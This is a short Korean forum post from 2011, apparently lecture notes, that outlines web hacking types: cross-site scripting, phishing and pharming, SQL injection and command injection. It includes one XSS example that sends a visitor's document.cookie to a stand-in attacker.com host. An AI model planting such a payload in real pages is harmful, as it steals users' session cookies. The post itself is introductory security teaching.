1586,

76/80

사용중

http://www.cyworld.com/csy_lovely

웹 해킹에대해서 알아보자 (2)

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1829 [복사]

1. Web hacking 유형
Cross-Site Scripting(XSS)
공격대상 사이트에 공격자 사이트를 크로스(걸쳐서)시켜서 공격하는 방법
<Cookie 빼내기 공격 예>
<script>document.location="http://attacker.com/attack/cookie attack.php?query="+document.cookie</script>
(웹 페이지에 악성코드를 삽입하여 접근하는 클라이언트에 자동실행)
피싱 : 공격자가 피싱메일을 발송 > victim이 이메일 내용에 현혹 > 링크되어 있는 사이트를 클릭
vkald : dns조작을 통한 피싱 업그레이드 버전 (web firewall에서 차단 불가능)

피싱과 파밍이 문제가 되고있는 까닭? < money >

SQL Injection
웹 애플리케이션에 의도적으로 SQL문을 삽입하여 로그인 인증과정을 우회하거나 공격자가 악의적인 쿼리문을 DB에 보내어 문제를 발생시킴 (DB정보 유출에서 포멧까지 다양한 공격가능) 웹 해킹중 가장 강력한공격

Command Injection
웹 애플리케이션에서 HTML 형식이나 쿠키, URL 파라미터 형식으로 시스템 명령어를 삽입 허용함으로써 웹 상에서도 시스템 명령을 실행할 수 있는 취약점

Hit : 8933 Date : 2011/08/03 01:13